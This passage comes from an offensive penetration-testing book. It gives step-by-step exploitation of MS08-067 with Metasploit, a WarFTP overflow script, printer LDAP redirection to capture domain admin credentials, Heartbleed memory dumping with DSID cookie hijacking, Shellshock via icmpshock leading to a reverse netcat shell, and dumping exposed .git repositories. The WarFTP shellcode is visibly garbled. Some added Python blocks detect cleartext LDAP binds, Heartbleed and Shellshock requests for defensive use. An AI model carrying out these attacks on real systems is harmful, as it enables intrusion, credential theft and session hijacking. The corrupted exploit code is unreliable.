click "Report Selected Issues." A reporting wizard opens; select XML and deselect "Base64-encode
requests and responses."





(Screenshot: the Burp Scanner Results tab for owaspbricks, listing SQL injection [3], Cross-site scripting (reflected) [3], Cleartext submission of password [6], Serialized object in HTTP message [10], Password field with autocomplete enabled and Cross-domain Referer leakage [2]; below it the Burp reporting wizard at "Choose the format for the report", with XML selected and "Base64-encode requests and responses" unchecked.)


Discover Burp Logs


And the output is a well-formatted CSV file with all your findings! This can make it quick for 
reporting, and quickly identifies what you are going to attack next. 


(Screenshot: the resulting CSV with the columns Path, Vulnerability and Description, listing findings under http://172.16.151.144/owaspbricks/ such as Frameable response (potential Clickjacking), Directory listing, Password field with autocomplete enabled and Path-relative style sheet import.)


Discover Burp CSV
Summary


Scanning the network is an important step for a successful network-wide penetration test. With such a
large scope, both passive and active scanning can provide information about the network, services,
applications, vulnerabilities, and hosts. Using specialized or customized port scans, web scraping,
"smart brute forcing," and automated tools can help you increase the efficiency and the effectiveness
of the test. These findings will directly lead into the next few sections on exploiting vulnerabilities
identified by this process.


The Drive - Exploiting Scanner Findings 


You were able to successfully complete your last mission of OSINT and scanning without being 
caught. The next phase of your mission is to take everything that you have gathered and learned to 
identify weaknesses and exploit them for fun and profit. 


As with the first THP book, The Drive section takes results from the prior phases and exploits them 
for an initial foothold into the company. Some findings might have exploits available through the 
Metasploit framework, some you might have to find on exploit forums, and some just take experience 
and knowledge to take advantage of misconfigurations. 


Whether you use Nexpose or Nessus (or any other vulnerability scanner) might not make a difference
for the exploitation process. Once a scanner finds a vulnerability, I will usually go and search for a
working exploit. I have dedicated a section in the later chapters to Vulnerability Searching and
how to find exploits based on findings from a scanner, but for now, I will briefly describe how to use
Metasploit, the importance of understanding scripts to exploit your vulnerabilities, and common
vulnerability misconfigurations.


Metasploit
(http://www.metasploit.com) (Windows/Kali Linux)


Before we can get into exploiting scanner findings, we need to quickly go over Metasploit again. The
Metasploit Framework is designed for developing, exploiting, and assisting in attacks. The best part
of the framework is that it was developed with research in mind. By this, I mean that it is very easy to
develop your own Metasploit modules and utilize them within the framework. It doesn't take a lot of
Ruby knowledge; basic scripting skills are enough. Without spending too much time explaining
Metasploit, let's walk through an example using the framework. Remember that this book is geared to
those that have some Metasploit experience. If you are pretty new to Metasploit, you should spend a
fair chunk of time learning the basics of this tool.


Here are a few helpful tips before we start with Metasploit. You should refer back to these tips while 
you are using Metasploit during your first few times; after that you should be good on your own. 


From A Terminal In Kali - Initialize And Start Metasploit:


• Start PostgreSQL
   ○ service postgresql start
• Start PostgreSQL on bootup
   ○ update-rc.d postgresql enable


• Start and stop the Metasploit service (this will set up your database.yml file for you)
   ○ service metasploit start
   ○ msfconsole
   ○ exit
   ○ service metasploit stop
• Log everything to /root/msf_console.log; at a command prompt:
   ○ echo "spool /root/msf_console.log" > /root/.msf4/msfconsole.rc
• Start the Metasploit command line
   ○ msfconsole


Running Metasploit - Common Configuration Commands: 


• help: Use help as much as you can!

• search [string]: Search for a vulnerability by CVE, title, application, etc.

• use [module]: select a module

• info: get information once a module is selected

• show options: show the requirements for the module

• set and setg: Set the variables from show options. You can use setg for global
variables. If you are jumping between modules and exploits and you don't want to
type in the IP address (or other input) every time, use setg instead of set

• If you are using a remote exploit, you might not see the PAYLOAD as a choice
inside show options, but you can always set it with: set PAYLOAD [hit tab a couple of
times to see the choices]

• To set custom payloads: set EXE::Custom [file]

• exploit -j: run the active module as a background job, so that connections to the
listening handler are accepted without tying up the console


Running Metasploit - Post Exploitation And Other


• sessions -K: Kill all sessions

• background: From a Meterpreter shell, go back to the main menu, but keep your
current session established in the background

• Resource file scripts to automate your handler (more info in the tips and tricks
section of the book): msfconsole -r resource.rc

• http://www.cheatography.com/huntereight/cheat-sheets/metasploit-4-5-0-dev-1357137


• http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands





The best method is to learn through example. I know that the MS08-067 vulnerability is pretty old, but 
I still find these vulnerabilities every so often and the attack is extremely stable compared to other 
remote attacks. For those who have never used or exploited the MS08-067 vulnerability, I 
recommend setting up a lab with an old unpatched Windows XP system and trying this exact example. 


If you are an expert MS08-067'er, you can skip this short section. 


Using Metasploit For MS08-067:


• Dropping into Metasploit on Kali:
   ○ Open up a terminal and type: msfconsole
• To search for a vulnerability, type:
   ○ search ms08-067
• Select the exploit from the search results, type:
   ○ use exploit/windows/smb/ms08_067_netapi
• See the options required for the exploit to work, type:
   ○ show options
• Set IP information, type:
   ○ set RHOST [IP of vulnerable Windows host]
   ○ set LHOST [IP of your machine]
• Select which payload (to get a better understanding of the types of payloads,
review: http://www.offensive-security.com/metasploit-unleashed/Payload_Types)
and encoder to use, type:
   ○ set PAYLOAD windows/meterpreter/reverse_tcp
   ○ set ENCODER x86/shikata_ga_nai
• Run the attack, type:
   ○ exploit





Metasploit 


These are the basics of Metasploit and we will build off these really quickly. Make sure you spend 
time exploiting Windows and Linux machines before trying any attacks in the wild. 


Scripts 


There were countless times where I found exploits for vulnerabilities that were not in Metasploit. 
Usually, when searching for vulnerabilities based on version numbers from the banner-grabbing 
script, I will find exploits in other places (see Special Teams - Cracking Exploits and Tricks 
section). A lot of the time, the scripts/codes will be written in Python, C++, Ruby, Perl, Bash, or 
some other type of scripting language. 


Note that as a penetration tester, you need to be familiar with how to edit, modify, execute, and 
understand the scripts/codes regardless of the language and be able to understand why an exploit 
works. I don't recommend you ever execute a script without testing it first. I have honestly seen a few 
scripts on forums and Exploit-DB where the shellcode payload actually causes harm to the intended 
system. After the script exploits the vulnerability, the payload deletes everything on the vulnerable 
host. I am pretty sure that your client would not be too happy if everything on his host system was 
wiped clean. This is why you should always either use your own shellcode or validate the shellcode 
that is within the script. 


WarFTP Example 


Let's say you find a vulnerable version of WarFTP server running and you find some code (for
example: http://downloads.securityfocus.com/vulnerabilities/exploits/22944.py) on the Internet.
Things you may need to understand:
• How do you run the exploit? What language is it? Do you need to compile it, or are
there any libraries you need to import?
• Are there any dependencies required for the exploit to work? Version of Windows
or Linux? DEP or ASLR?
• Are the EIP addresses, any other registers, or padding values hardcoded to
specific versions? Do they need to be modified?
• Will the exploit take down the service? Do you only have one chance at
compromising the host? This is very important, as you might need to work with the
client or test a similar infrastructure environment.


Here is an example of what your script could look like and, if run properly, could allow shell access 
on the victim server. 


#!/usr/bin/python

import os
import sys
import struct

# unbuffered stdout so the whole buffer is written out in one piece
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)

# return address that overwrites EIP (the hex digits are partly illegible in this copy of the book)
eip = 0xfa8ct3el

# encoded payload; the byte escapes on the following lines are damaged in this copy of the book
shellcode = "\xeb\x03\%59)\xeb\ x05) хеВ\ ХЇБ\ wit) eft) eff) x49) 491 449) 49V 491 y"
shellcode += "ix49|x49|x491 x 49 X481 x491 x49 x49 X491 X49 «49 x 481 X51) X58 X 68"
shellcode += "ix58ix30|x42| x31 x50 x 421 Mal) X65 x421 X411 4521 X321 X42 R42) X 421"
shellcode += "ix411x41 x20 1 x411 x41Y x 501 x30 x 421 x42 x 50 x75 x 4a x 49 x ob) x 4c"
shellcode += "ix5aix5aix4bi x32! x6dVx6dV 438 x48 x79 x 4b x 42 «4b x AT x Ab x AY"
shellcode += "x71 x62 хла} x45 x51) 450) x51) 449) «61V 3301 455) x46) x3 1 x 4b х4ї"
shellcode += "ix50| x61 Vx 78 x6e\ x4dV x 6b x69) x74) x45) 258) x48 x61) x43 x 4b x 41"
shellcode += "\x56\x33\x5a\x4b\ x 4f x69) x62 1x 661x571 x39 x62 x 68 x70) x 4C x dbi"
shellcode += "i x37  x6bAx4c i x6dix53Xx621 x34 x 721 x54) x 491 x621 x 78 x56 x30 х52"
shellcode += "AXx6£ x T8 x70) x65) x 38V x 781 x50) x 621 x Tal x 7 x74) x51) xf x 665 x33Y"
shellcode += "ix4fix4eix36| x 79A x 6Z Vx 68V x70) x42"

# move the stack pointer away from the payload before it runs
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -1001h
prepend += "\x44"                      # inc esp

# USER command: filler up to the saved return address, EIP, a short NOP sled, then the payload
buf = "USER "
buf += "A" * 485 + struct.pack('<I', eip) + "\x90" * 4 + prepend + shellcode
buf += "\r\n"

sys.stdout.write(buf)





Example Exploit 


Even with MS08-067, the exploit is operating system and service pack dependent. Luckily, the
Metasploit exploit for it tries to identify the proper OS before exploiting the host. A lot of the exploits
that are written in scripting languages do not take this into account and are developed for a single OS
type. This is why you will often see that the exploit contains information about the system on which it
was tested. Even within the same operating system, something like the language of the OS can cause
an exploit to fail or cause a denial of service. For example, the following PCMAN FTP buffer
overflow exploit was only tested on the French version of Windows 7 SP1. This does not guarantee
that this exploit will be successful on the English version.
(Screenshot: the Exploit-DB entry "PCMAN FTP 2.07 PASS Command - Buffer Overflow", EDB-ID: 27277, CVE: N/A, OSVDB-ID: 94624, Author: Ottomatik, Published: 2013-08-02, Verified. The script header reads:)

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-

PCMAN FTPD 2.07 PASS Command Buffer Overflow
Author: Ottomatik
Date: 2013-07-31
Software: PCMAN FTPD
Tested On: Windows 7 SP1 - French;

* The PASS Command is vulnerable to a buffer overflow;
* Other commands may be vulnerable;


FTP Exploit Example Script


This is why I recommend you understand and test all of your exploits before you try them on any 
production host and make modifications to scripts as necessary. 


Printers 


It often happens that we overlook low-level findings, but there are many times where we can go from
low to owning the network. One of my favorite examples is with printers. We all come across a ton of
multi-function printers (MFP) on our engagements and, in the past, have overlooked them. What if
these MFP devices could lead to a compromise on the network?

You jump on a network and currently don't have any credentials. You might want to start small and
scan only your current subnet so as not to alert any IDS sensors. In doing so, you come across a
multi-function printer.


Maybe your scanner picks up default credentials, or you guess the password from reading the
documentation. {5} Or perhaps you come across an unpatched printer and use an exploit from your
printer exploitation folder; check out the /opt/praedasploit
(https://github.com/MooseDojo/praedasploit) folder. Once in the administrative console, you poke
around and nothing really of value is there, or is there? You notice that these enterprise multi-function
printers have the capability to query the domain for email addresses via LDAP. This is what lets
someone standing at the printer's little LCD screen look up an email address by name when scanning a
document. What if you could pull the password of the user account the printer uses to bind to the LDAP
server and run those queries? {6}


We first log into our Xerox MFP with the default credentials over HTTP. Like I said before, I am 
sure we see this pretty much on every penetration test. 


(Screenshot: Xerox CentreWare Internet Services for a XEROX ColorQube 8900X at 192.168.10.10, Status tab, Description & Alerts: Name xerox, Status: Alert: Paper Tray Empty, Machine Model: Xerox ColorQube 8900.)


Default Multifunction Printer


A quick Google search (or maybe your scanner identifies the default password) and you know that the 
admin password is 1111. Going to the “Properties” tab, we can see that this printer is configured with 
LDAP to query the domain. 
(Screenshot: the Properties tab listing enabled services such as SMB Filing, SMTP (E-mail), SNMP and WSD (Web Services on Device), each with an Edit button.)


Multifunction Printer - LDAP setting


Looking at the configuration, we need to modify the LDAP server so that it points to our Kali attack 
VM. This way, any LDAP lookups will be directed to our LDAP server instead of the corporate 
LDAP server. 


We see in the username, that it currently uses a domain account and although the password field is 
blank, we can still make changes without re-entering the password information. We go ahead and 
save our configuration changes. 


(Screenshot: the LDAP Server page of CentreWare Internet Services for the XEROX ColorQube 8900X, Properties tab, with Server Information (IP Address: Port, Backup IP Address: Port), Search Directory Root, Login Credentials to Access LDAP Server with Login Name hacker.testlab\Domain Admin Account and an empty password field, and the SSL options Enable SSL (Secure Socket Layer), Validate Repository SSL Certificate (trusted, not expired, correct FQDN), Trusted SSL Certificates and No validation.)


Multifunction Printer - LDAP Modification





Now, we just need to wait until the MFP creates an LDAP lookup and we should be able to capture 
the credentials. Luckily, in the case of Xerox (and many other printers), they have a feature to test 
your LDAP queries. 


We can click the "User Mappings" tab and test a user lookup. 
(Screenshot: the User Mappings tab with its user lookup test.)


MFP - LDAP Check


Remember that we are now pointing the LDAP server to our Kali Linux box. Before testing an
account, we need to set up a netcat listener on the specified server we set in the configuration page
above. We start a quick listener on port 444 (or whatever port you configured), go back into the
management console, and hit the "search user" button.


(Screenshot: terminal on the Kali box, partly legible:)

# nc -l -vv -p 444
listening on [any] 444 ...
inverse host lookup failed: Unknown server error : Con
connect to [...]
...hacker.testlab\Domain Admin Account...$uper$ecretPass!!


MFP - Capturing LDAP Credentials


Looking at our netcat output, we now see that the MFP, which is connected to our Kali netcat listener 
via LDAP, tried to authenticate using a Domain Admin Account and a password of 
“Super$ecretPass!”. 


In most cases, you might not come across a domain admin account, but you will have your first 
account to move laterally through the network. 
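What the listener received is an LDAP simple bind carrying the password in the clear, which is exactly the traffic a defender would want to alert on. As an added example (not from the book or any vendor), this Python decodes an LDAP BindRequest from raw bytes and flags simple binds that carry a password over an unprotected connection; the bind DN and password come from the capture above, rebuilt here as a constructed message, and the password itself is never returned, only its length.

```python
def read_tlv(buf, offset=0):
    """Read one BER tag-length-value at offset; return (tag, value, offset after it)."""
    if offset + 2 > len(buf):
        raise ValueError("truncated BER element")
    tag, length = buf[offset], buf[offset + 1]
    offset += 2
    if length & 0x80:                       # long form: low bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[offset:offset + n], "big")
        offset += n
    if offset + length > len(buf):
        raise ValueError("BER length exceeds buffer")
    return tag, buf[offset:offset + length], offset + length


def encode_tlv(tag, value):
    """Encode one BER element (short and long length forms)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    lb = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def build_simple_bind(message_id, bind_dn, password):
    """Constructed test input: an LDAPv3 BindRequest using simple authentication."""
    bind = (encode_tlv(0x02, bytes([3]))             # version 3
            + encode_tlv(0x04, bind_dn.encode())     # name (the bind DN)
            + encode_tlv(0x80, password.encode()))   # authentication: [0] simple
    return encode_tlv(0x30, encode_tlv(0x02, bytes([message_id]))
                      + encode_tlv(0x60, bind))      # [APPLICATION 0] BindRequest


def inspect_ldap_message(data, over_tls=False):
    """Flag simple binds whose password travels in the clear (not inside TLS)."""
    tag, msg, _ = read_tlv(data)
    if tag != 0x30:                          # every LDAPMessage is a SEQUENCE
        return None
    _, mid, off = read_tlv(msg)
    op_tag, op, _ = read_tlv(msg, off)
    if op_tag != 0x60:
        return {"bind_request": False, "message_id": int.from_bytes(mid, "big")}
    _, ver, off = read_tlv(op)
    _, name, off = read_tlv(op, off)
    auth_tag, cred, _ = read_tlv(op, off)
    simple = auth_tag == 0x80
    return {
        "bind_request": True,
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "bind_dn": name.decode("utf-8", "replace"),
        "simple_bind": simple,
        "password_length": len(cred) if simple else 0,   # length only, never the secret
        "cleartext_password": simple and len(cred) > 0 and not over_tls,
    }


if __name__ == "__main__":
    sample = build_simple_bind(1, "hacker.testlab\\Domain Admin Account", "$uper$ecretPass!!")
    print(inspect_ldap_message(sample))
```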


Heartbleed 


Heartbleed is one of those buzzword security vulnerabilities that blew up in 2014. Unfortunately for 
network administrators and system owners, this vulnerability was one of the worst issues of that year. 
The Heartbleed bug was a vulnerability in OpenSSL that allowed an attacker to read parts of the 
server’s memory. So what does this really mean? You can ask a server that uses SSL security for 
encryption to perform a request and, in addition, give you some allocated chunk of memory back. For 
an easier visual reference, visit this xkcd article: http://xkcd.com/1354/. From the xkcd comic strip, 
you ask for a word to be returned (example: dog), but ask for the size to be returned as 500 bytes 
instead of the normal 3 bytes. The server will return the word “dog” back to you, and in the process, 
you will also receive any other memory that might have been allocated in previous requests. 
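The "dog, but 500 bytes" case from the comic, as an added example that is not from the book: this Python builds a constructed heartbeat record and applies the bounds check that a fixed OpenSSL performs, which is also what a detection rule would test on heartbeat records seen on the wire. The constants follow RFC 6520 (heartbeat content type 24, at least 16 bytes of padding).

```python
import struct

TLS_HEARTBEAT = 24            # TLS record content type for heartbeat messages
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520: at least 16 bytes of random padding


def build_heartbeat(payload, claimed_length, padding=MIN_PADDING):
    """Constructed test input: a TLS 1.0 heartbeat request record.

    claimed_length is the payload_length field written into the message; an
    honest peer sets it to len(payload).
    """
    body = struct.pack("!BH", HB_REQUEST, claimed_length) + payload + b"\x00" * padding
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 1, len(body)) + body


def check_heartbeat(record):
    """Bounds-check an incoming heartbeat the way patched OpenSSL does.

    'malformed' is True when the declared payload_length cannot fit inside the
    record, i.e. the peer asks to have more bytes echoed than it actually sent.
    """
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    ctype, vmaj, vmin, rlen = struct.unpack("!BBBH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return {"heartbeat": False, "content_type": ctype}
    body = record[5:5 + rlen]
    if len(body) < 3:
        return {"heartbeat": True, "malformed": True, "reason": "no payload_length field"}
    hb_type, claimed = struct.unpack("!BH", body[:3])
    needed = 1 + 2 + claimed + MIN_PADDING          # type + length + payload + padding
    max_real_payload = rlen - 1 - 2 - MIN_PADDING   # most payload this record can hold
    return {
        "heartbeat": True,
        "type": hb_type,
        "record_length": rlen,
        "claimed_payload_length": claimed,
        "malformed": needed > rlen,
        # bytes an unpatched server would copy from memory beyond the request
        "excess_bytes": max(0, claimed - max_real_payload),
    }


if __name__ == "__main__":
    print(check_heartbeat(build_heartbeat(b"dog", 3)))     # honest: length matches
    print(check_heartbeat(build_heartbeat(b"dog", 500)))   # "dog" but asks for 500 bytes
```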


We don't know exactly how many systems were vulnerable, but zmap.io did a scan of the Alexa Top
1 Million domains as of April 16, 2014 and reported which domains were vulnerable at the time.
Supposedly, reports have stated that even today some of the domains are vulnerable. See
https://zmap.io/heartbleed/vulnerable.html.


The scary part was what was found in the memory space. From numerous penetration tests, we found 
passwords, usernames, random strings, emails, session keys, and even private SSL certificates. With 
private SSL certificates, we can now decrypt any traffic that we sniff. 


So let's walk through one example. Although there are numerous tools (a Metasploit module is
available) to pull memory from vulnerable OpenSSL services, we are going to compile our own:


• cd /opt/
• wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c
• gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
• chmod +x heartbleed


We should have a heartbleed binary to execute against a vulnerable service. The most common way 
to exploit heartbleed was via HTTPS, but it is not the only way. One more interesting example that I 
have seen in multiple environments is OpenLDAP built against a vulnerable OpenSSL. We all know 
that LDAP is the authentication and authorization source for many different companies, and being 
able to pull sensitive data out of it could be detrimental. 


From our vulnerability scanner output, we see that 192.168.100.101 is vulnerable to Heartbleed. 
Let’s take the binary we just compiled and execute it against that host: 

• ./heartbleed -s [IP] -p [port] -f [output file] -v [verbose] -t [type] 
• example below: ./heartbleed -s 192.168.100.101 -p 636 -f output_ldap -v -t 1 





[Screenshot: heartbleed binary output - a heartbeat record of type=24 is returned and 16384 bytes of heap are written to the output file] 

Heartbleed check 


What might we see in the output_ldap file? If you look closely, we see an {SSHA} hash. We 
could take that into oclHashcat and crack it. In the same dump, we could have also seen user 
accounts, organizational structure, and private SSL certificates as well. We could have made a copy 
of the private SSL certificate and sniffed all the traffic to that LDAP server. This could mean that we 
would have every user's account that authenticated against this LDAP server. 

Heartbleed - LDAP Memory Disclosure 


Now, we know there are tons of different Web and LDAP servers that were vulnerable, but these 
aren’t the only juicy sources of Heartbleed data. One of the largest issues and attacks seen with 
Heartbleed was that it affected SSL VPNs. Imagine for a second that you could read the server’s 
memory on a VPN server. What would be the impact if you could see usernames and passwords? In 
theory, you would have direct access as any user that was logged in at that time. What if the 
vulnerability was exploited after-hours? Whose account might you compromise? In the case of 
Heartbleed, as many IT administrators VPN’ed in during the rush to patch systems, they could have 
been getting compromised at the same time. 


Let’s take a look at the Juniper SSL VPNs that were vulnerable to this bug. Running the same 
command as before, we query the SSL VPN web server to return what is stored in the designated 
memory space. A result would look like the following: 





Heartbleed - SSL VPN 


In this case, the client even had two-factor authentication, but remember how two-factor works with 
SSL VPNs. Once you authenticate with both username/password and token (second factor), you get 
back a web session ID. If you capture just the web session ID, you can impersonate this user 
(without the second factor) by taking their session ID and importing it into your own browser. For 
example, we see in the heartbleed memory dump a cookie called DSID. What is the DSID? 


“The SA issues an HTTP cookie to authenticate a user session (DSID), which is shared by client 
components (that is, NC/WSAM/Pulse) and the browser. Generally, browsers do not store cookies in 
any secure manner; so it is relatively easy for an attacker to obtain the DSID cookie and gain access 
to an SA session.” {7} 


This is the user’s session cookie! If we grab this cookie and create this cookie in our browser, we 
become this user. So let’s open up Firefox, access the VPN server, select Cookies from the Web 
Developer tab, and view Cookie Information. 
Heartbleed - Adding a Cookie 


You might already see two different cookies or the DSID cookie might even be missing. Just add it in 
with the DSID value you obtained from the Heartbleed bug and reload that page. 


[Screenshot: Firefox cookie list for host suck.testlab showing two cookies - DSSIGNIN (value url_default, path /dana-na/, expires Thu, 31 Dec 2037) and the manually added DSID (path /, expires at end of session) carrying the value recovered from the Heartbleed dump] 

Heartbleed - Adding the DSID Cookie 





From recent assessments, I don’t really see Heartbleed publicly accessible as often as when it first 
came out, but I still find it often on internal engagements. 


Shellshock 


Shellshock was the second huge vulnerability in 2014 that caused a multitude of systems to get 
infected all over the Internet.{8} Shellshock was a vulnerability that allowed remote code execution 
because of the way Bash handles the string “() { :; };”. The vulnerability relied on how the system 
parsed environment strings. Although this didn’t solely affect CGI, the fact that CGI scripts can be 
run by Bash, with request headers exported to them as environment variables, made this 
vulnerability easily attackable over HTTP. The first part of the exploit string, which is really just an 
environment-variable function definition followed by a semicolon, is written as "() { :; };". 
Regardless of what the function definition contains, all we care about is the value we inject after 
the trailing semicolon, which will be parsed and executed by vulnerable versions of Bash. 


Shellshock Lab 


This sounds complex, but the best way to demonstrate shellshock is through an example. This will 
give you a good understanding of how it works. The OWASPBWA vulnerable web application 
virtual machine is vulnerable to the Bash exploit, so make sure you have it running. Log into that VM 
image and copy the vulnerable cgi file listed below first. 


On the OWASPBWA VM Image from a Terminal: 


• wget --no-check-certificate https://raw.githubusercontent.com/cheetz/icmpshock/master/test.cgi -O /usr/lib/cgi-bin/test.cgi 
• chmod +x /usr/lib/cgi-bin/test.cgi 
• Find the IP of the vulnerable host (ifconfig) 


This will write a CGI shell script to the cgi-bin folder, which we need in order to exercise the 
vulnerability. Remember that for something like Shellshock to work over the web, it needs a script 
in the cgi-bin folder that is executed by Bash. You can access it by going to a browser and entering 
http://[IP of vulnerable host]/cgi-bin/test.cgi. If everything worked, you should see a page that just 
says “hi”. 


Going back to our attacking Kali host, we are going to use a tool I created called icmpshock.py (note 
that there is also a Metasploit module, so try them all). The reason I created this script is because I 
wanted the tool to brute-force through all common cgi type files at an amazing speed and test all the 
common HTTP header information (User-Agent, Cookie, Host, Referer) with ShellShock. As long as 
you have a pretty big pipe, you can take advantage of Python's threading to brute-force through all cgi 
files/directories in just seconds. Remember that we are going for quick and efficient to try to pop as 
many boxes as possible. 
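The header list above is also what a defender should watch. As an added example (not the book's icmpshock.py), this Python parser flags the Bash function-definition prefix in the CGI-exported headers of a raw request and in the Referer/User-Agent fields of a combined-format access log; the requests and log lines are constructed samples, and the slightly loose regex is an assumption.

```python
import re

# Pre-patch Bash treats any environment variable whose value starts with the
# literal "() {" as a function definition and keeps parsing past the closing
# "};", so whatever follows is executed. A CGI server exports request headers
# into the environment (HTTP_USER_AGENT, HTTP_COOKIE, ...), which is the path
# icmpshock-style scanners drive. The regex is a little looser than Bash about
# whitespace so that lightly obfuscated variants are caught too.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def parse_request_headers(raw_request):
    """Return {lowercased-name: value} for the headers of an HTTP/1.x request text."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:        # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def find_shellshock_headers(raw_request):
    """Names of headers whose value Bash would parse as a function definition."""
    return sorted(name for name, value in parse_request_headers(raw_request).items()
                  if SHELLSHOCK_RE.match(value))


# Apache/nginx "combined" format: only Referer and User-Agent survive into the
# log, so Cookie/Host-based attempts need the full request (above) or an IDS.
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def scan_combined_log(lines):
    """Return (client_ip, request_line, field) for entries carrying the pattern."""
    hits = []
    for line in lines:
        m = COMBINED_LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.match(m.group(field)):
                hits.append((m.group("ip"), m.group("req"), field))
    return hits


# Constructed samples (not captured traffic): one ordinary request and one
# carrying the Shellshock prefix in two CGI-exported headers.
BENIGN_REQUEST = (
    "GET /cgi-bin/test.cgi HTTP/1.1\r\n"
    "Host: 192.168.222.130\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0)\r\n"
    "\r\n"
)
ATTACK_REQUEST = (
    "GET /cgi-bin/test.cgi HTTP/1.1\r\n"
    "Host: 192.168.222.130\r\n"
    "User-Agent: () { :; }; /bin/ping -c 1 192.168.222.129\r\n"
    "Cookie: () { :;}; /bin/ping -c 1 192.168.222.129\r\n"
    "\r\n"
)
SAMPLE_LOG = [
    '192.168.222.129 - - [10/Oct/2014:01:08:48 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 3 "-" "Mozilla/5.0"',
    '192.168.222.129 - - [10/Oct/2014:01:08:49 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 3 "-" "() { :; }; /bin/ping -c 1 192.168.222.129"',
    '192.168.222.129 - - [10/Oct/2014:01:08:50 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_shellshock_headers(ATTACK_REQUEST))
    print(scan_combined_log(SAMPLE_LOG))
```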


Now, we go back to our attacking VM host, which you have already configured at the beginning of the 
book, and go to: 

• cd /opt/icmpshock/ 
• chmod +x icmpshock.py 
• gedit target_list.txt and add the vulnerable server's IP 
• Start up tcpdump to listen for ICMP in a new terminal window: 
  o tcpdump -nni eth0 -e icmp[icmptype] == 8 
• ./icmpshock.py [Listener IP of the Kali Host] target_list.txt 


This script will brute-force through many different common cgi paths and filenames. If it successfully 
identifies a file and that file is a shell script, it will inject the Shellshock exploit to force the system 
to ping back to our attacking host. This shows that the victim is not only vulnerable, but that we also 
have command execution. 


This is why we set tcpdump to listen to ICMP requests. In the example below, the icmpshock.py 
script is going through its list of cgi location/files and when it hits cgi-bin/test.cgi, it causes the victim 
host to ping our attacker box. 


[Screenshot: two terminals on the attacking host. tcpdump (tcpdump -nni eth0 -e icmp[icmptype] == 8) captures an ICMP echo request from 192.168.222.130 to 192.168.222.129 while icmpshock.py (listening address 192.168.222.129, thread count 100, target_list.txt) reports HTTP CODE 200 for http://192.168.222.130/cgi-bin/test.cgi] 

ICMPShock Exploit 





We now know we have command execution and can go back to our script to change the “Command” 
variable to run whatever shell command we want: 
• gedit icmpshock.py 


We won’t get into post exploitation in this section, but the easiest thing to do would be to spawn a 
reverse netcat shell. Let’s uncomment the code with the /bin/nc command and comment out the 
original ping command. 


[Screenshot: icmpshock.py open in gedit. The Command variable is switched from the ping test to the /bin/nc reverse shell line (marked "uncomment this"), and the same Command string is appended to the "() { :; }; " prefix in the USER_AGENT, Cookie and Host header variables] 

ICMP Shock - Enabling a Netcat Listener 


After making modifications to the code, we need to open a new terminal window and set up a listener 
(instead of the ICMP tcpdump setting configured in the prior example) on the attacking host: 
• nc -l -p 4444 


Run the icmpshock.py tool again and you should get a connection back. To test, we can run a quick 
“list directory contents” command (ls) and we should see the files in that directory. 


[Screenshot: on the attacking host, nc -l -p 4444 receives the connection back; running ls returns test.cgi and whoami returns www-data, while icmpshock.py (listening address 192.168.222.129, thread count 100) reports HTTP CODE 200 for http://192.168.222.130/] 

ICMPShock - Exploit 











We have a full shell on all the vulnerable shellshock systems. We aren't limited to only web-based 
shellshock exploits either, as you can see below: 
• SSH: 
  o http://resources.infosecinstitute.com/practical-shellshock-exploitation-part-2/ 
• DHCP: 
  o https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment. 
• OSX/VMware: 
  o https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_func 
• OpenVPN: 
  o http://www.darknet.org.uk/2014/10/openvpn-vulnerable-to-shellshock-exploit/ 


Dumping Git Repositories (Kali Linux) 


It is becoming a very common practice for web developers to implement revision control systems for 
their code base. Different examples of these tools are Git, Bazaar, Mercurial and Subversion, but they 
all work relatively the same. A common mistake seen throughout many development environments is 
that developers tend to leave their repositories (repo) publicly accessible. {9} {10} 


As a penetration tester, once a repository is identified via a web scanner, the common technique is to 
clone the repository, look for sensitive information in different commits, and restore older versions of 
the applications. As seen in our next example, Git repositories are usually found in a .git directory 
(example: 10.10.10.10/.git/). 


[Screenshot: browsing to 10.10.10.10/.git/ returns an "Index of /.git" directory listing: Parent Directory, FETCH_HEAD, HEAD, ORIG_HEAD, branches/, config, description, hooks/, index, logs/, objects/, packed-refs, refs/] 

Vulnerable Git Repository 


We can clone the whole remote Git repository onto our Kali Linux host by running a recursive wget 
command from the .git root (we will assume 10.10.10.10 is the vulnerable server): 

• cd ~ 
• wget -r http://10.10.10.10/.git/ 
• cd 10.10.10.10 


We now have the Git repository cloned onto our local computer and we can run a couple of Git 
commands to pilfer for data. The first command to run is a status command. A status command shows 
you the status of files in the index versus the working directory and can be run by: 

• git status 


